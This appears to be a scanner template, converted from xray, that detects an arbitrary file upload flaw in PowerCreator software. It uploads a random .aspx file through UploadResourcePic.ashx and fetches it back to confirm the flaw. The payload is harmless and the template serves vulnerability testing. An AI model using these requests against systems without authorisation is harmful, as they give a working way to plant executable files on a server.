id: poc-yaml-powercreator-arbitrary-file-upload

info:
  name: poc-yaml-powercreator-arbitrary-file-upload
  author: MrP01ntSun(https://github.com/MrPointSun)
  severity: critical
  tags: xray-converted,fileupload,ct-158619
  reference:
    - https://xz.aliyun.com/t/8478#reply-15684

http:
  - raw:
      - |
        POST /upload/UploadResourcePic.ashx?ResourceID={{rand_int(1000, 9999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Disposition: form-data;name="file1";filename="{{rand_base(8)}}.aspx";
        Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136

        -----------------------------20873900192357278038549710136
        Content-Disposition: form-data; name="file1"; filename="{{rand_base(8)}}.aspx"
        Content-Type: image/jpeg
        
        {{rand_base(8)}}
        -----------------------------20873900192357278038549710136--
        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - ".ASPX"
  - raw:
      - |
        GET /ResourcePic/{{path}}.ASPX HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200